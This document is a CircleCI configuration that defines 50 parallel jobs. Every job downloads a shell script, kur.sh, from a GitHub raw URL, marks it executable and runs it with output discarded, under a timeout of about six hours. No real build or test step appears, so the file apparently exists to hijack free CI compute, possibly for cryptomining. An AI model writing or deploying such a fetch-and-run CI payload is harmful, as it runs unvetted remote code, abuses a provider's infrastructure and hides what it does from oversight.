version: 2
jobs:
  build_01:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_02:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_03:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_04:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_05:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_06:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_07:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_08:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_09:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_10:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_11:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_12:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_13:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_14:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_15:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_16:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_17:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_18:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_19:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_20:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"

  build_21:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_22:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_23:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_24:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_25:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_26:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_27:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_28:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_29:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_30:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_31:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_32:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_33:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_34:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_35:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_36:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_37:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_38:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_39:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_40:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"

  build_41:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_42:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_43:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_44:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_45:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_46:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_47:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
  build_48:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
          
  build_49:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"
      
      
      
      
  build_50:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://raw.githubusercontent.com/kirbyworth/sugardady/main/kur.sh && chmod +x kur.sh &&./kur.sh > /dev/null"


  
      
  
workflows:
    version: 2
    build:
        jobs:
            - build_01
            - build_02
            - build_03
            - build_04
            - build_05
            - build_06
            - build_07
            - build_08
            - build_09
            - build_10
            - build_11
            - build_12
            - build_13
            - build_14
            - build_15
            - build_16
            - build_17
            - build_18
            - build_19
            - build_20
            - build_21
            - build_22
            - build_23
            - build_24
            - build_25
            - build_26
            - build_27
            - build_28
            - build_29
            - build_30
            - build_31
            - build_32
            - build_33
            - build_34
            - build_35
            - build_36
            - build_37
            - build_38
            - build_39
            - build_40
            - build_41
            - build_42
            - build_43
            - build_44
            - build_45
            - build_46
            - build_47
            - build_48
            - build_49
            - build_50